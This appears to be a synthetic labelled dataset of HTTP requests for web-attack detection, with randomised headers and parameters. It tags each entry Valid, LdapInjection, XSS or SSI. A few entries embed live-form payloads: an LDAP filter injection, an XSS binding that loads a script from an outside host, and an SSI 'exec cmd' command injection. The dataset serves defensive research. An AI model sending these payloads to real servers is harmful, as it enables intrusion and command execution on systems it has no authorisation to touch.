Proxy-Authorization: el3ew eon38=myylbi
Authorization: NTLM RWVhNGhub2VubWduOGUycGRtZnNpZW9rc2xlZXJ0bzNwbGVlbm10
Range: 31145-
Referer: http://www.r7hm.net/banat0/ctist/seuyims/slanse/iUoqie.pl
TE: trailers,trailers
Trailer: TE
User-Agent: nuodDhreedtoiti
UA-CPU: Sparc
UA-Disp: 1839,4933,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 888x837
Via: FTP/4.1 www.i9uemt.tiff, 5.6 74.251.131.178:69, FTP/3.0 225.235.11.96
Transfer-Encoding: deflate
Upgrade: bHo/6.3, 1iTaa/1.7
Warning: 535 www.WEsie.png "n0eI9" "Sun, 21 Dec 08 09:51:07 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 0800772649
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14761
Start - Id: 38937
class: LdapInjection
GET /caU/inJ.yCY3D2.asmx?xtoshm=798242&EswNjvar7-P=s+l&kE59arae=044%29%28%26%28objectClass%3Dipr%29%28%7C%28sn%3D++++4ng%29%28cn%3Dse++++J*%29%29 HTTP/1.1
Host: 62.174.199.80
Connection: close
Accept: */*
Accept-Charset: windows-1252, windows-1251;q=0.1
Accept-Encoding: compress
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 53.164.177.129
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="0"
Date: Tue, 04 May 04 09:50:01 UTC
ETag: "RHbGytE2gouVJIdHqaSm"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Tue, 09 Feb 10 14:40:03 UTC
If-Unmodified-Since: Wed, 12 May 04 02:37:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 341
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: ntlLS xIrohh=oriLdkca
Range: 19115-,-68,486-99
Referer: http://www.9aWlah.st/aqt7hz/laDR4aa/niitkxo/noemrnn/r7zIh.mpg
TE: chunked;q=0.4,trailers
Trailer: From
User-Agent: Eitciehoed/9.7.8.6.2
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 425x879
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: nocAo/1.3, tgd/7.3, c3isen/9.2, BaeeL/8.6
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38937
Start - Id: 5580
class: Valid
POST /Bbc/sghtdnewtmce/s6SQpxaiqF7/nizR5eeu/NaEHA0dJ/sPpGdRIIaQcE4m7mIw.A.jpeg? HTTP/1.0
Content-Length: 38
Content-Language: esc,geajhm,otetsel
Content-Encoding: deflate
Content-Location: http://www.vYeh.de/onobf/frli.zip
Content-MD5: YVZkcnN0Y3VzdGF3bmxuaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Jul 05 09:58:37 CET
Last-Modified: Sun, 08 Oct 06 18:51:09 UTC
Host: www.sqddm.fr
Connection: gdno
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: gzip
Accept-Language: eoacssN-cf;q=0.8, 4en-m;q=0.2
Cache-Control: oie0='dgnhl'
Client-ip: 69.57.15.36
Cookie: sirhentlh=9465036036;GTIHADkBcpu5=sbceaeaaot;ntciso=9138
Cookie2: $Version="811"
Date: Fri, 23 Sep 05 10:37:03 GMT
ETag: "fuxz3LZh9X2M1kWy0"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Thu, 30 Jul 09 08:30:27 CET
If-Unmodified-Since: Wed, 17 Sep 08 12:48:28 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jan 10 02:33:58 GMT
Max-Forwards: 20
MIME-Version: 6.2
Pragma: iahsi=hRtasocn
Proxy-Authorization: nhlnto edro0=ee95q
Authorization: bihb vcca9tl=neermfxa
Range: 673-
Referer: http://shig.fr/ip6ir9/neep.txt
TE: deflate;q=0.3,gzip,trailers
Trailer: Authorization
User-Agent: htdy/6.4.7.0
UA-CPU: x86
UA-Disp: 972,439,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0202x3743
Via: 4.9 205.41.102.25, iiH/5.9 www.euht.jpeg
Transfer-Encoding: gzip
Upgrade: aCrv/3.2, uNt/4.1, agThej/0.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 07654558799930280172
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

rmPwelot8=702&agnohore=1m@eo tt5xaqn

End - Id: 5580
Start - Id: 11691
class: Valid
GET /thrMdlynie/x0a_3Oe.Fb9QjY/OznoaXnswerd1hih/eSQ/aR@ziO2dfq4f68zE/l4a56mtAzYj_O.php? HTTP/1.1
Host: 173.252.75.70
Connection: close
Accept: application/*, audio/*;q=0.2, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate;q=0.6, deflate;q=0.7, compress
Accept-Language: b-J7tfdix1, u-mhsse8u;q=0.2, frnEEs-wbca, e-ho;q=0.8, r5-lgtuxo;q=0.6
Cache-Control: max-age=64076
Client-ip: 231.66.203.222
Cookie: sFL8wmcuB2in3=duy;iyuth=h df5xgeC>fstdinsrxT;Nh=tneictTv;1hTes4gdH==;tnoitdPaeL2=t3xbKw0NqX;JPbXvFR@pl.M=gioRecnutooorsswo
Cookie2: $Version="29"
Date: Sat, 01 Mar 08 21:41:20 GMT
ETag: W/"vlPTD9@nIM@0fyK2eaZ1"
Expect: 100-continue
From: oNld@rNLext3e.ch
If-Modified-Since: Mon, 01 May 06 14:09:40 UTC
If-Unmodified-Since: Thu, 11 Sep 08 17:13:44 UTC
If-Match: "OpS0VcNF@sU4ZiM"
If-None-Match: *
If-Range: *
Max-Forwards: 9095
MIME-Version: 2.8
Pragma: c=7emh7e
Proxy-Authorization: Digest opaque="ciapc"
Authorization: twpMe uicno=39Bzetg
Range: 345-226
Referer: http://quite.st/gthia/oEoC.gif
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 2.5; 9h-Eo; rv:6.4.7) Gecko/10637218
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9315x6291
Via: pasC/7.6 www.7yoae.html, 8.4 14.149.225.111, HTTP/0.2 www.vhdlws.png
Transfer-Encoding: deflate
Upgrade: egst/3.3
Warning: 332 53.2.135.109:03070 "minediIh8t" "Mon, 24 Jul 06 15:04:51 CET"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11691
Start - Id: 20385
class: Valid
GET /4eGX5e%uPA8home_.k/etioae6diilsReoaeiy/aEne/302R/mirt/aroot1lrt/p9u/eUwSNk9r.sh?bTsgscea=1096135&tfehseer=Z6oiesdIt0eltnoa&ui=biframeamhttpel+e%2Fyoewo&MVc1HUyshutdownWO=oSQbmWg&aahRuaaec=echooi7boot.inih7Reiecny%5BA8&Fpc.g=10655440&SGulV=aao%3Fn HTTP/1.1
Host: 64.186.80.27
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: stp='oaeauri'
Client-ip: 154.205.171.226
Cookie: riojDctia95u=52996767;oede=2;Zeed2tmu=86;oreitiavicE7aw=apositionsgteed
Cookie2: $Version="6"
Date: Mon, 25 Dec 06 16:47:17 CET
ETag: W/"FkFBBTp5N8Mwz4jd"
Expect: mbdVi
From: ueaw@nsel.fr
If-Modified-Since: Fri, 08 Aug 08 09:49:00 CET
If-Unmodified-Since: Sun, 02 Jul 06 09:36:41 GMT
If-Match: "dGz04exn86tuTpdSCmV"
If-None-Match: "DlUI78naVATpu3@"
If-Range: Mon, 22 Oct 07 01:24:09 CET
Max-Forwards: 39
MIME-Version: 5.8
Pragma: b='enepwn'
Proxy-Authorization: Basic aGVtbGV3Om1mb2Vo
Authorization: seaye Ohltkshm=petc1m
Range: 76141-2977,-2,838977-2
Referer: /n8i7siis.tiff
TE: gzip,trailers,gzip;q=0.1
Trailer: Authorization
User-Agent: Mozilla/2.9 (Machintosh; U; PPC Mac OS X 9.2; ld-Gh; rv:7.4.7) Gecko/30410810
UA-CPU: Sparc
UA-Disp: 8020,2426,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: 2.3 109.15.4.30, 4.3 89.167.194.183
Transfer-Encoding: identity
Upgrade: wbsoPk/6.5, ona/5.9, rnyanm/2.0, ej1ben/3.4
Warning: 519 www.toonc.htm "orEiieino7cus" 
X-Forwarded-For: 126.30.228.195
X-Serial-Number: 11331311370992169456
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20385
Start - Id: 3242
class: Valid
GET /eDOjnjAD9obg5yY1/ZwgetNBformtNqk8ZQ/ot/k8YNNOpQr4Zh/dsaoEat3igjdhEsdepIi/nes/jiOrakm6a.bin? HTTP/1.1
Host: www.ylAimTLo.be
Connection: sfef
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pf-t6l;q=0.9, ulssxrr-vht;q=0.8, ov2t5el-vttae, caruss-Oac3t, allse-se
Cache-Control: max-stale=979
Client-ip: 112.59.59.14
Cookie: oi0er=shE~enwogkd[p;Acaemant=ohxH+mb;sqciokesrfil=e6ipee3esyA;t1pvel=ee?|5t/e-a$ NJimi
Cookie2: $Version="39"
Date: Wed, 20 Dec 06 20:09:00 UTC
ETag: "Mpe.8n2Qm9RRdSN"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Sun, 24 Jan 10 16:37:53 CET
If-Unmodified-Since: Fri, 26 Mar 10 19:46:58 GMT
If-Match: *
If-None-Match: *
If-Range: "Vi67YpYm5hnRIOy"
Max-Forwards: 21
MIME-Version: 6.0
Pragma: learelrt=ouao4ohw
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Basic aW93cm0ycTpsc3dv
Range: -0418,8-
Referer: /riiLt/nEurrsa/M5lie5/osUhoo.tiff
TE: trailers,trailers
Trailer: Authorization
User-Agent: elsC4@NnRR http://www.rnnZrh.biz
UA-CPU: StrongARM
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 796x812
Via: FTP/8.9 248.227.181.240, HTTP/3.3 198.93.213.59, trt/3.3 www.hsfwKuus.css:733
Transfer-Encoding: deflate
Upgrade: m2sia/0.4, ltolt/9.3, r9eb/4.7, shc6de/5.3
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3242
Start - Id: 22681
class: Valid
GET /4DYIQaD4HoP4DpH5i/p3Mb0-t0o/duee9ow6mpol7ntya.dll?Ya9reuto=26&@owinntN-htmp.=danameasft9otaheqt&io4rrtenbciAe=6d7speOainLmji&220p1vBM=s8&iyC5MQ=wDg.ZeFnAR&rwe6ah3trhleni=sCTl.fk%40%40vf&rvrlpetbnLj4rn=gAF6-fm9xpq HTTP/1.1
Host: www.yor9lz.cz:80
Connection: close
Accept: video/*
Accept-Charset: iso-10646-ucs-2, windows-1252
Accept-Encoding: gzip
Accept-Language: *;q=0.1
Cache-Control: setpa=a
Client-ip: 140.201.37.237
Cookie: rmh42Hai=jWtaE;dtheeisa1NoeI=7331
Cookie2: $Version="1"
Date: Thu, 21 Oct 04 06:34:42 CET
ETag: "tWRFI1RNSslcvhnp"
Expect: annonel
From: ohhR@ti5t.uk
If-Modified-Since: Tue, 15 May 07 10:15:45 UTC
If-Unmodified-Since: Tue, 21 Jun 05 05:36:08 UTC
If-Match: "y9K24YwchxJrpQpTB"
If-None-Match: "SUfgSusetmOJvNB"
If-Range: Thu, 24 Sep 09 09:04:41 UTC
Max-Forwards: 7596
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: lcrnh iqehemnd=knaee
Range: -29,25075-,866-349335
Referer: http://ntar.fr/annft/hAe6ti/eornfe/i1s6ieks.png
TE: deflate,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 6.5; ev-5e; rv:3.0.7) Gecko/49066312
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0084x738
Via: HTTP/1.3 www.vrotoO.jpeg, tgr/5.6 www.atni.css:98, HTTP/1.0 90.24.240.30
Transfer-Encoding: gzip
Upgrade: ksDigc/5.0
Warning: 339 www.8cxlJeOf.htm "y9hruhNaeio8rni" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22681
Start - Id: 48064
class: XSS
GET /owhi5txgimu4h4omer4/pzrrpsrprar0e9aao/hiCqtntOt8tb0rsur6k/nrhNfFKY5VQ/tzv-6DCL/tyVt_m/sM/sotEdfsmngi9dOct/ivx/n43Uo-h01G2V/erot.msf?sir=12366941&t7mtezthMn0lmf=mieecho&ntesOg=adecuetpeeeo&tet=tdiatNbna6teaR4b&AU3LXURRT50=4528&ieratscntg1=711536&hsireen=lnn&tputnsres=e&5slanolsomz=%3Cdiv+++++style+++%3D+%22++++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.ngnatoie.com%2Fscript%2Faesosjr.msf%5D%29%3B+%22%3E HTTP/1.0
Host: www.mnuqat1Zcu.ch:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: amt6srD-dyaa
Cache-Control: no-transform
Client-ip: 43.162.196.251
Cookie: gt3iscccohs=81;s0a6fGMlF=nddHp;litod21eio9=heornonbhtr;weyloge3soSldab=fld;aioor=645929174;truoqnhliIipo=osai8z
Cookie2: $Version="9"
Date: Tue, 15 Sep 09 24:07:19 UTC
ETag: W/"@AY44BLRCYw-DcLtsp"
Expect: 100-continue
If-Modified-Since: Sat, 06 Jan 07 16:44:22 UTC
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: "VYGRq2r4i2S0Y45u0pgG"
If-None-Match: "gqNLXdeo-YVHoePWr"
If-Range: *
Max-Forwards: 430
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: sedh aaieeArs=mnoE
Referer: /e6bbi/fatk/xnesNp.msf
Trailer: Warning
User-Agent: Hhm7pgldxh (ih5WagACj; m6OQ3dTp@5)
UA-CPU: PowerPC
UA-Disp: 722,7880,8
UA-Pixels: 2342x2073
Via: b6ian/2.9 22.49.125.72, 9.8 154.110.167.73
Transfer-Encoding: gzip
Upgrade: wAre6i/8.0, kmnmln/4.1, u2nAT/4.0
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 0.164.67.65

null

End - Id: 48064
Start - Id: 81
class: Valid
GET /yitoyaOocxuoajktbSo/ndsSwitecexedlie/wti5aHt/pottw.mdb?mapnny=%2Bupdate&MRbk8PY=3864100&2v@cJo3E=ago&um=%27ee&hoaamdsuvhctT7=1127579&ehiFotiry=Se%245d HTTP/1.1
Host: www.hz7oM.ch
Connection: msiSrAm
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.171.86.36
Cookie: psdlleyfsbh=icguk
Cookie2: $Version="49"
Date: Sun, 24 Sep 06 24:22:22 CET
ETag: W/"AShFJJomkmXUQfFrlj."
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Sun, 17 Jul 05 18:51:58 GMT
If-Unmodified-Since: Fri, 27 Apr 07 24:50:54 CET
If-Match: "Vscl-KSB1pEKcJ_g"
If-None-Match: *
If-Range: "8L9xwygp-q3.164Wq"
Max-Forwards: 780
MIME-Version: 0.0
Pragma: drnurwrS=as6a
Proxy-Authorization: Digest uri=/5Eth/NasEi/4flTue17/eeiv/xfrHtst7.gz
Authorization: Basic cmNqYTo2emVk
Range: 41396-563,553741-
Referer: /51lutea/Lniranm.htm
TE: chunked;q=0.8
Trailer: Date
User-Agent: tratsdEdfd (5TMArtMEt; 0txo9Hi; ms0jahDz)
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: FTP/5.5 15.31.80.191
Transfer-Encoding: deflate
Upgrade: plohnd/1.0
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 28.137.198.105
X-Serial-Number: 9033271704641075484
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 81
Start - Id: 18751
class: Valid
GET /X15k2YSS_Zadmin9Wform/pepe/ubstylespassthruZxZQdT-/and0wqAV0r2SLRRidh/vtgsfm.tiff? HTTP/1.1
Host: 30.73.5.19
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.9, identity, compress, gzip;q=0.7
Accept-Language: Cifg-ooitu;q=0.2, eeYrd-haa;q=0.0, DEit9v-iner;q=0.2, Nmo-Rtaa;q=0.2, qscsta-y9n9a7;q=0.7
Cache-Control: max-stale=2
Client-ip: 19.188.65.223
Cookie: 0BcnhvisvCnor=sae ceto4 ok;eslre=84046372;Arnull7=5;ojdnoeh6wvgteui=7odPiW@;ce1hnE5dibe8=742975;n0ioesiumT56r=pwCBCvnsQ
Cookie2: $Version="1"
Date: Sun, 18 Oct 09 13:15:31 CET
ETag: "eMtpcpbh@B.vn9rAhj"
Expect: hgUds2ti=hiaSe
From: envreer4@lEts7.gov
If-Modified-Since: Sun, 08 Jul 07 05:52:32 GMT
If-Unmodified-Since: Wed, 21 Feb 07 13:25:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8136
MIME-Version: 1.7
Pragma: alfeeit=ip2l
Proxy-Authorization: Digest algorithm=MD5
Authorization: S2hjN hETa=nbdtSe
Range: 43867-
Referer: /ssNb/oOmrbrrr.wmn
TE: trailers,gzip;q=0.0
Trailer: Accept
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 8.6; ip-es; rv:4.1.2) Gecko/52426335
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 854x2880
Via: 8.6 0.227.18.242, 1.2 148.231.43.117
Transfer-Encoding: gzip
Upgrade: e7tu/5.3, HipE/9.9
Warning: 921 www.wRltoroI.gif "hibn" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18751
Start - Id: 5553
class: Valid
POST /seiv8aMabtcac1i/hMrbe/RxtermF63ddeleteGE.html? HTTP/1.0
Content-Length: 121
Content-Language: s
Content-Encoding: gzip
Content-Location: http://www.wrxai.org/sCxeyomt/csaiE.avi
Content-MD5: bm83RTNlSGF4RXRvbmVmdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 May 09 17:54:20 CET
Last-Modified: Thu, 17 Feb 05 23:56:42 UTC
Host: www.smaaba.org
Connection: uaeenev
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew, iso-8859-5, ks_c_5601-1987;q=0.6, x-mac-icelandic;q=0.3, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: 3gt39vo='ro'
Client-ip: 119.64.122.217
Cookie: dteot=oiet;0gio4srashasa=41810;cMldsnwgo=ncEo ;haxacRapyhy=creaiao
Cookie2: $Version="633"
Date: Tue, 24 Jun 08 12:35:40 UTC
ETag: W/"x-Vsn4wHKsPgPMe5_w0"
Expect: 100-continue
From: Ee7etP@xeyR4seoht.biz
If-Modified-Since: Sun, 11 Mar 07 01:56:12 GMT
If-Unmodified-Since: Wed, 23 Feb 05 10:59:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.1
Pragma: woii2r=as
Proxy-Authorization: Basic YXRvVGhuOnRvYTQ=
Authorization: NTLM aG9uNm9uNDZxc25oc2JubmRoY2VvMWJhdG5lbXN0ZGVhZjQ2OGE=
Range: 188-,1-78718,0-
Referer: http://www.eoaa.de/abto8o/g1pNcat/fgst/baer/58xeo.conf
TE: trailers
Trailer: Referer
User-Agent: cozeoohi (rh4mvoIi_; r21SaDR08; fhjef_eJ)
UA-CPU: x86
UA-Disp: 6011,239,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6340x801
Via: lrLA/9.2 www.i2ri.tiff, sani/4.1 91.8.173.14:2553, FTP/4.3 www.tts4kn.gif
Transfer-Encoding: gzip
Upgrade: stiii8/0.8, etgqe/5.2
Warning: 515 www.nnu4b.html:6 "c1oAatosDgemieiOeix" "Sun, 15 Nov 09 16:15:49 CET"
X-Forwarded-For: 71.229.52.229
X-Serial-Number: 5097796244152405039
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

tsnoseeucecr=srt ko8l&Uneyttppa=261170500&zUGnE=iw+iqaoeyu&qi=14481&Dhc7cezth=dropi&h28bwn1FnFue=5464&auhs2ntvgf=andnts

End - Id: 5553
Start - Id: 14260
class: Valid
GET /ooam/eesoirideHc9dt3Nps/eFtZ3cpKb37/orlpmmR/e8V/@v/N5Udado6eehsdydlh7/01eknrtjldearcv.aspx?HEfE4GC=20041&22heosohMce=7&7YSaP=tden+si&lSd=305480&McA_AU3_@=QitNnetcatu%25mt%3F5b&HttRo3rered=o8ehO%25uanYeh&UMWAt-=5&aYszz=b%3DpsjwhereEnlocationino4TopenconnectadminnaI&nnp1brireo=kne&hncesi=od2i0d&EOJgyFIHnA=Hdio%2FAao&CesslEas=vh7&nCduepuocaa=oltO%27v4Df+iEt&of0ztpbr8taoeo=790503 HTTP/1.0
Host: 20.1.14.117
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: 
Accept-Language: aneCa-vtteu;q=0.4, yS-Isgqmu;q=0.6, 5oreh3-E
Cache-Control: max-stale
Client-ip: 110.246.2.165
Cookie: edctn6hswis=0;gnhoSdtwSzt8=a ;uy5u8=hOOj_dB;lthftrddsle=Paiu4dAa6gRa
Cookie2: $Version="960"
Date: Sat, 29 Apr 06 16:49:22 GMT
ETag: W/"9NYTjtyVsu4-K5pmEI4C"
Expect: 100-continue
From: ahix3@EtdheeDzo.cz
If-Modified-Since: Tue, 12 Apr 05 22:17:20 GMT
If-Unmodified-Since: Fri, 23 May 08 07:19:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: yTotsr iaoreos=CaathcdY
Authorization: Digest uri=/nvnoeew/potb/4Eagh.txt
Range: -45
Referer: /ihiLk.png
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.7 (X11; U; SunOS sun4u 9.9; en-na; rv:6.1.4) Gecko/82287878
UA-CPU: 68000
UA-Disp: 300,717,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1753x6779
Via: 4.4 230.76.58.153
Transfer-Encoding: gzip
Upgrade: mex/4.6, wcax5/9.3, r9Ytj/6.3, stb/2.3
Warning: 245 www.shn0o.jpg "rrtOe3dbt8i84ttada" "Mon, 10 Aug 09 22:29:45 GMT"
X-Forwarded-For: 252.132.26.90
X-Serial-Number: 4359426
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14260
Start - Id: 40023
class: SSI
GET /eaDeberioMbcl/73NX1SSThRvbmcz8EKkh/EfriYyno/rwL./7fimIhba6xin/otllaecqha/taroeq/hy0nCzuUwWxAw9ib/nK3aq-1yBBlink.mdb?tL1hntnns=m-WT&b5lDel5bsivi=amhsiasas0b&mz9WYY=0&seoa=as9&kesgeotdmpdshdt=%3C%21++++%23%3C%21--+++%23exec+++cmd%3D%22id%22--%3E&Adosua3eo=teEu&8e.window.open=rvagroup+by+gsY5&uehuepll=14&nnTO9aeUdq=038950 HTTP/1.0
Host: 141.49.101.235
Connection: he73to
Accept: audio/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 52.59.150.100
Cookie: @.jW-=rerjt795dEd;m9rnc3tXe=te ;elLeihhnonedBr=d~hgn)(7;Hajtn=qplafaan;eeefnrIyWEhfT=097;ayneri3Rvx=046
Cookie2: $Version="3"
Date: Sat, 11 Sep 04 19:05:37 GMT
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: 100-continue
From: bic3us@lb0or.fr
If-Modified-Since: Sun, 11 Feb 07 03:54:13 CET
If-Unmodified-Since: Sat, 01 May 04 05:32:46 GMT
If-Match: "5fTPlicAl4VVn.Vv-LTB"
If-None-Match: *
If-Range: Mon, 13 Apr 09 14:35:29 CET
Max-Forwards: 274
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: Digest cnonce="ainumz"
Range: 639193-1,618159-02
Referer: /rdeeyob/onmw1Nn/tesl.mspx
TE: deflate;q=0.4,trailers
Trailer: Accept
User-Agent: Mozilla/4.0 (X11; U; Unix 9.9; en-lo; rv:3.8.3) Gecko/44160868
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: Nrnoel/4.3 www.oaaas.png:85930, 1.4 128.124.42.106:03, HTTP/9.5 www.H3sLt.gif
Transfer-Encoding: iehr
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 801 www.A9Ccfets.tiff "iayeatistfeuar6rsnb" "Tue, 13 Sep 05 19:40:44 GMT"
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40023
Start - Id: 4284
class: Valid
POST /xoehc/r1riY.Vbk/Mlxaefu/5eesrd1de/iksEu8-FSxGg8/onesniFmrndnt/uvVtDmuGW/e47wI/eac1eisTlluIdtSo/atdnmiwrbmQAa3ncOU/ehogIamuu/sedhajtmjcrE03y8.jsp? HTTP/1.1
Content-Length: 185
Content-Language: C,eerfi,b
Content-Encoding: compress
Content-Location: /sdhtiAlB/nnea/o1hO.jsp
Content-MD5: SXh0TjRpYkZuNGw3cnZleA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Sep 04 14:28:29 CET
Last-Modified: Thu, 20 Jul 06 23:40:52 UTC
Host: 30.92.181.63
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.4, gzip;q=0.7, deflate
Accept-Language: 6A-d;q=0.9
Cache-Control: no-cache
Client-ip: 214.181.125.246
Cookie: wlK=u;elAlwh=tan
Cookie2: $Version="6"
Date: Mon, 22 Aug 05 12:01:18 GMT
ETag: "Uv7Qocx@cE_rEtGAi5ZY"
Expect: 100-continue
From: d4tmdhbi@dApmaveH.gov
If-Modified-Since: Thu, 09 Nov 06 21:37:40 GMT
If-Unmodified-Since: Sun, 24 Jul 05 18:11:25 CET
If-Match: "w4si0tliVRcGnXUX"
If-None-Match: "OTI3j2A8JnPQT9KG"
If-Range: Wed, 30 Apr 08 15:32:17 GMT
Max-Forwards: 799
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic dGRsbmM6b2xneWNp
Authorization: Digest username="Odtta4eo"
Range: 557-
Referer: http://aeejRat.cz/r1cU3/1NhgLr/1aroTyl.jpeg
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: ius3/9.8.0.6
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5153x5817
Via: 5.8 www.lSr9nl.html
Transfer-Encoding: gzip
Upgrade: Unh/4.4
Warning: 787 www.taikmdp.html:2894 "o4xcDruec" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 41906
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ehld=3791&eEaforhozitgfa=or2d&ne9=teeu&een1H=&i$&hdrdefvinozs=983755&OO=9&saAhsps=hrsqserviceshaYhmriaru&0kvh=ls&S2Nf=8&6rifrr=i&laymtrrtEo=49692411&thhxOn=m\vft&execpGN=638550588

End - Id: 4284
Start - Id: 37652
class: LdapInjection
POST /V6TOcnItW/s1cDaS9KSH-e-J1TQw48.shtml? HTTP/1.0
Content-Length: 80
Content-Language: itil
Content-Encoding: gzip
Content-Location: /rel7/shns4cUE/ka79tc/wrTem.mspx
